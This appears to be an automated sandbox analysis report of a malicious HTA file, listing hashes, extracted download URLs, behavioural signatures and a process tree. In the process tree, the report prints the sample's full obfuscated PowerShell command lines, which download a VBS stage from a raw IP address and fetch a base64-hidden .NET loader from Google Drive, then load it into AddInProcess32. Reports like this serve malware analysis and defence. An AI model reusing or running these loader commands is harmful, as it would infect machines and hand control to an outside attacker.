Analysis
-
max time kernel
121s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
28-10-2024 02:37
Static task
static1
Behavioral task
behavioral1
Sample
5f5a5e0bee42f891a5766a05041909db6981c8e6de0de123cc41196b5089ec59.hta
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
5f5a5e0bee42f891a5766a05041909db6981c8e6de0de123cc41196b5089ec59.hta
Resource
win10v2004-20241007-en
General
-
Target
5f5a5e0bee42f891a5766a05041909db6981c8e6de0de123cc41196b5089ec59.hta
-
Size
131KB
-
MD5
88525e906bbdf8d8c07e66a6fb654a21
-
SHA1
98cd664d60e4e83e2d51ace6b8e89b4ad2992684
-
SHA256
5f5a5e0bee42f891a5766a05041909db6981c8e6de0de123cc41196b5089ec59
-
SHA512
8aeef95955d338c9e78559a40dba58031d09fe7b2048e59f840dcd34f4c23825381b699ef6113975b65b0858d895a8369d6ed7e5d9cd63dfb6a8496799f63730
-
SSDEEP
96:Eam73NoY+bAFoM+bAbSvGe8DEo1ofB+bA23oqc7T:Ea23SH06T0mQqfs024xT
Malware Config
Extracted
https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur
https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur
Signatures
-
Blocklisted process makes network request 3 IoCs
flow pid Process 3 3028 POWErshell.EXE 6 2876 powershell.exe 8 2876 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 2964 powershell.exe 2876 powershell.exe -
Evasion via Device Credential Deployment 2 IoCs
pid Process 3028 POWErshell.EXE 2892 powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 6 drive.google.com 5 drive.google.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 8 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language POWErshell.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 3028 POWErshell.EXE 2892 powershell.exe 3028 POWErshell.EXE 3028 POWErshell.EXE 2964 powershell.exe 2876 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 3028 POWErshell.EXE Token: SeDebugPrivilege 2892 powershell.exe Token: SeDebugPrivilege 2964 powershell.exe Token: SeDebugPrivilege 2876 powershell.exe -
Suspicious use of WriteProcessMemory 28 IoCs
description pid Process procid_target PID 2472 wrote to memory of 3028 2472 mshta.exe 30 PID 2472 wrote to memory of 3028 2472 mshta.exe 30 PID 2472 wrote to memory of 3028 2472 mshta.exe 30 PID 2472 wrote to memory of 3028 2472 mshta.exe 30 PID 3028 wrote to memory of 2892 3028 POWErshell.EXE 32 PID 3028 wrote to memory of 2892 3028 POWErshell.EXE 32 PID 3028 wrote to memory of 2892 3028 POWErshell.EXE 32 PID 3028 wrote to memory of 2892 3028 POWErshell.EXE 32 PID 3028 wrote to memory of 2772 3028 POWErshell.EXE 33 PID 3028 wrote to memory of 2772 3028 POWErshell.EXE 33 PID 3028 wrote to memory of 2772 3028 POWErshell.EXE 33 PID 3028 wrote to memory of 2772 3028 POWErshell.EXE 33 PID 2772 wrote to memory of 2596 2772 csc.exe 34 PID 2772 wrote to memory of 2596 2772 csc.exe 34 PID 2772 wrote to memory of 2596 2772 csc.exe 34 PID 2772 wrote to memory of 2596 2772 csc.exe 34 PID 3028 wrote to memory of 1944 3028 POWErshell.EXE 36 PID 3028 wrote to memory of 1944 3028 POWErshell.EXE 36 PID 3028 wrote to memory of 1944 3028 POWErshell.EXE 36 PID 3028 wrote to memory of 1944 3028 POWErshell.EXE 36 PID 1944 wrote to memory of 2964 1944 WScript.exe 37 PID 1944 wrote to memory of 2964 1944 WScript.exe 37 PID 1944 wrote to memory of 2964 1944 WScript.exe 37 PID 1944 wrote to memory of 2964 1944 WScript.exe 37 PID 2964 wrote to memory of 2876 2964 powershell.exe 39 PID 2964 wrote to memory of 2876 2964 powershell.exe 39 PID 2964 wrote to memory of 2876 2964 powershell.exe 39 PID 2964 wrote to memory of 2876 2964 powershell.exe 39
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\5f5a5e0bee42f891a5766a05041909db6981c8e6de0de123cc41196b5089ec59.hta"1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2472 -
C:\Windows\SysWOW64\WindoWsPowerShELL\v1.0\POWErshell.EXE"C:\Windows\sYsTeM32\WindoWsPowerShELL\v1.0\POWErshell.EXE" "PowerShelL.EXe -EX Bypass -NOp -w 1 -C dEviCEcREdEnTiaLDEployMENt.EXE ; IEX($(iEx('[SySTEm.tEXT.EncODInG]'+[char]58+[chAr]0x3A+'utF8.GetstrINg([sysTEm.CoNveRt]'+[CHAr]58+[CHaR]0x3A+'FROMBAse64stRInG('+[ChaR]34+'JHk1cSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC10WXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1iRVJkZUZJTklUaU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxtT24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBEaU1qVmpTREdFLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3dXptLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBGRGpYZWVWaSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGt5LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBZYlBSanJpKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJZbGFsb1AiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lc3BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgb2RNQiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICR5NXE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDQuMTY4LjcuNTEvNDMxL2dvb2RwZXJzb253aXRobmljZWhlYXJ0d2hpY2hraXNzeW91Z29vZGxpcHMudElGIiwiJEVOdjpBUFBEQVRBXGdvb2RwZXJzb253aXRobmljZWhlYXJ0d2hpY2hraXNzeW91Z29vLnZiUyIsMCwwKTtzVGFyVC1zbEVFUCgzKTtzdEFSdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXGdvb2RwZXJzb253aXRobmljZWhlYXJ0d2hpY2hraXNzeW91Z29vLnZiUyI='+[chAr]0x22+'))')))"2⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3028 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX Bypass -NOp -w 1 -C dEviCEcREdEnTiaLDEployMENt.EXE3⤵
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2892
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\su9vyc-0.cmdline"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2772 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES79D2.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC79D1.tmp"4⤵
- System Location Discovery: System Language Discovery
PID:2596
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\goodpersonwithniceheartwhichkissyougoo.vbS"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1944 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnVXo2aW1hZ2VVcmwgPScrJyBQZ1lodHRwczovJysnL2RyaXZlLmcnKydvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2FkJicrJ2lkPTFBSVZnSkpKdjFGNnZTNHNVT3libkgtc0R2VWhCWXd1ciBQZ1k7VXo2d2ViQ2xpZW50ID0gTicrJ2V3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkMnKydsaWVudDtVejZpbWFnZUJ5dGVzID0gVXo2d2ViQ2xpZW50LkRvd25sb2FkRGF0YShVejZpbWFnZVVybCknKyc7VXo2aW1hZ2VUZXh0ID0nKycgW1N5cycrJ3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoVXo2aW1hZ2VCeXRlcyk7VScrJ3o2c3RhcnRGbGFnID0gUGdZPCcrJzxCQVNFNicrJzRfU1RBUlQ+PlBnWScrJztVJysnejZlbmRGbGFnID0gUGdZPDxCQVNFNjRfRU5EPj5QZ1k7VXo2c3RhcnRJJysnbmRleCA9IFV6NmltYWdlVGV4dC5JbmRleE9mKFV6NnN0YXJ0RmxhZyk7VXo2ZW5kJysnSW5kJysnZXggPSBVejZpbWFnZVRleHQuSW5kZXhPZihVejZlbmRGbGFnKTtVejZzdGEnKydydCcrJ0luZGV4IC1nZSAwIC1hbmQgVXo2ZW5kSW5kZXggLWd0IFV6NnN0YXJ0SW5kZXg7VXo2c3RhcnRJbmRleCArPSBVejZzdGFydEZsYWcuTGVuZ3RoO1V6NmJhc2U2NExlbmd0aCA9IFV6NmVuZCcrJ0luZGV4IC0gVXo2c3RhcnRJbmRleDtVejZiYXNlNjRDb21tYW5kID0gVXo2aW1hZ2VUZXh0LlN1YnN0cmluZyhVejZzdGFydEluZGV4LCBVejZiYXNlNjRMZW5ndGgpO1V6NmJhc2U2NFJldmVyc2VkID0gLWpvaW4gKFV6NmJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSAyUmwgRm9yRWFjaC1PYmplY3QgeyBVejZfIH0pWy0xLi4tKFV6NmJhJysnc2U2NEMnKydvbW1hJysnbmQuJysnTGVuZ3RoKV07VXo2Y29tbWFuZEJ5dGVzID0gW1N5c3RlbS4nKydDb252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhVejZiYXNlNjRSZXZlcnNlZCk7VXonKyc2bG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKFV6NmNvbW1hbmRCeXRlcycrJyk7VXo2dmFpTWV0aG9kICcrJz0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChQZ1lWQUlQZ1kpO1V6NnZhaU1ldGhvZC5JbnZva2UoVXo2bnUnKydsbCwgQChQZ1knKyd0eHQuVFRWR0ZSLzEzNC8xNS43Ljg2MS40MCcrJzEvLzpwdHRoJysnUGdZLCBQZ1lkZXNhdGl2YWRvUGdZLCBQZ1lkZXNhdGl2YWRvUGdZLCBQZ1lkZXNhdGl2YWRvUGdZLCBQZ1lBZGRJblByb2Nlc3MzMlBnWSwnKycgUGdZJysnZGVzYXRpdmFkb1BnWScrJywgUGdZZGVzYXRpdmFkb1BnWSxQJysnZ1lkZXNhdGl2YWRvUGdZLFBnWWRlc2F0aXZhZG9QZ1ksUGdZZGVzYXRpdmFkb1BnWSxQZ1lkZXNhdGl2YWRvUGdZLCcrJ1BnWWRlc2F0aXZhZG9QZ1ksUGdZMVBnWSxQZ1lkZXNhdGl2YWRvUGdZKScrJyk7JyktckVwTGFjRSAnVXo2JyxbQ2hhUl0zNiAtY1JlcExhQ2UgJ1BnWScsW0NoYVJdMzktY1JlcExhQ2UnMlJsJyxbQ2hhUl0xMjQpIHwgLiggJFZlUmJPc2VQcmVGRXJFTmNFLnRvU3RSSW5nKClbMSwzXSsneCctak9pbicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2964 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('Uz6imageUrl ='+' PgYhttps:/'+'/drive.g'+'oogle.com/uc?export=download&'+'id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur PgY;Uz6webClient = N'+'ew-Object System.Net.WebC'+'lient;Uz6imageBytes = Uz6webClient.DownloadData(Uz6imageUrl)'+';Uz6imageText ='+' [Sys'+'tem.Text.Encoding]::UTF8.GetString(Uz6imageBytes);U'+'z6startFlag = PgY<'+'<BASE6'+'4_START>>PgY'+';U'+'z6endFlag = PgY<<BASE64_END>>PgY;Uz6startI'+'ndex = Uz6imageText.IndexOf(Uz6startFlag);Uz6end'+'Ind'+'ex = Uz6imageText.IndexOf(Uz6endFlag);Uz6sta'+'rt'+'Index -ge 0 -and Uz6endIndex -gt Uz6startIndex;Uz6startIndex += Uz6startFlag.Length;Uz6base64Length = Uz6end'+'Index - Uz6startIndex;Uz6base64Command = Uz6imageText.Substring(Uz6startIndex, Uz6base64Length);Uz6base64Reversed = -join (Uz6base64Command.ToCharArray() 2Rl ForEach-Object { Uz6_ })[-1..-(Uz6ba'+'se64C'+'omma'+'nd.'+'Length)];Uz6commandBytes = [System.'+'Convert]::FromBase64String(Uz6base64Reversed);Uz'+'6loadedAssembly = [System.Reflection.Assembly]::Load(Uz6commandBytes'+');Uz6vaiMethod '+'= [dnlib.IO.Home].GetMethod(PgYVAIPgY);Uz6vaiMethod.Invoke(Uz6nu'+'ll, @(PgY'+'txt.TTVGFR/134/15.7.861.40'+'1//:ptth'+'PgY, PgYdesativadoPgY, PgYdesativadoPgY, PgYdesativadoPgY, PgYAddInProcess32PgY,'+' PgY'+'desativadoPgY'+', PgYdesativadoPgY,P'+'gYdesativadoPgY,PgYdesativadoPgY,PgYdesativadoPgY,PgYdesativadoPgY,'+'PgYdesativadoPgY,PgY1PgY,PgYdesativadoPgY)'+');')-rEpLacE 'Uz6',[ChaR]36 -cRepLaCe 'PgY',[ChaR]39-cRepLaCe'2Rl',[ChaR]124) | .( $VeRbOsePreFErENcE.toStRIng()[1,3]+'x'-jOin'')"5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2876
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5ddff5b87e4c034f00e39a99abd76bd89
SHA174443b5d55ba82534ab0c25e97f9c77bfa5998d2
SHA256967a8f469a9db26eb0b9a3464836ce5726804e2cbcc6bc794b529445f7a82b16
SHA512323b797d926b070eef2537e7ed10c56bd827cab347bbb994c84deacb329146ca4b1f212c5ab790faa677bd34a40b73704c8136cf95411bda658f57c5267de87f
-
Filesize
3KB
MD5cca290b23425dea5100e3cd85af6698e
SHA1d8bde873f49d4a371e6747bcc9e30c47d6d5e3a7
SHA2568efcdca4483a932f1d080cf60ca949035614fc16d74619a9a751595ccd7e46d5
SHA51240f52be9e3c48c0f2d4d09b5ed0428ec23de8516fb1efc0b89fae4772fca7c4fabc246948ab4a100996fc1d204cfb13f1c465a9c263eade56091485102592688
-
Filesize
7KB
MD55901541cfae0a57262c32271ceabb76b
SHA1779f7b6d0ae43770dc9799b7a31b6d7a56801626
SHA25665e5c62e69d36cf0ec7565995e42ff220f9bec62470b59fd0aa9ac9ae0d73391
SHA5129702ac62155172cbe0149653212917c728d2e0d3504774f54cf20e09f9d8eaa939232af1fbc8ec8492aba9658bf76b0ebbad5a95bc9869d0b747a3ccd2fdbc0d
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD5499d1783e591f132a31769ee90d5103e
SHA1cb91f457258598fba85595a29869958c8697c790
SHA256d740282f44dbca1e0b94d4ab21e4d63ef0bd6c3e562e6645be1ad0c72dd51252
SHA5124313614b885c1f8abbd3b0c5c80f8a4fd0b60e83884ec0eb49d5c4249bd7e773a15f8a453de9d6582e69c4a2de335f43d87f82f1a2c7ff82fffbe9030ebf7314
-
Filesize
137KB
MD5c9a6ade10107f7dd1d69608ac357ba33
SHA17a71cb67d442243b88e10add79acee9c7d64df97
SHA2566cc331a7bcfa86026d435553558a1d1ced841baea6cb3b9b7a0b5eac6227c055
SHA5129aede0bde73ccbbf68b08f7f673477aa84ed6eeb66ba91e022e92e45e793279eb32262ddbfc4898daa7a0a92c4d312f446e4c495b586b6ab9916acabed9e7d60
-
Filesize
652B
MD5392e05dae2d1889b3f0f620b34234607
SHA18584a912c116f650e8d8fc02b331c5ef74695642
SHA256e00473ddb6f071b8e1e52a488dea119ce52852e2bcda9aac99a6bccf41f70941
SHA5121c8a7bff647b259da7e09493c6b57ac0c97f5ec2ad67cf41a4f73c0fe32f400fb44ff0536edfb774afe1c2699fd6a8a23a1384f2815a30bd9be3c58b7131f02b
-
Filesize
466B
MD551aedd46dfa764086bf5f9ad2ddde14b
SHA11e07f345bcbb60e7c6ee0dce0f59528d68429ecb
SHA256855eeda734e7a630d7e8ec0d9e45f2bfa71f2ccd35b2d14595ea4b6a93c9959a
SHA512f2689db9d4a626afcb10eaabce3ec8da360b244fe5b539e1919754cb5daa6c68d34d1398f67561fd6d924e6002e7682a56f4020f74cb22fe4448960cb4073f22
-
Filesize
309B
MD57801107878883f45221826f834ff09c3
SHA139272ab7e25e3d56aba959dec3b742401caa75bb
SHA2565a892a44bedfa9e328222767288df8ea347eeab7e4e8e8c0b7ead38101c8b63b
SHA512161b954a7f2aa6d7c4b7367c20485df52e2ca476ee81221b00a323caf36484d43ca5433099d23347facccfc8bc3281841d1b736a92ff0cfc90b70310ff63a7fc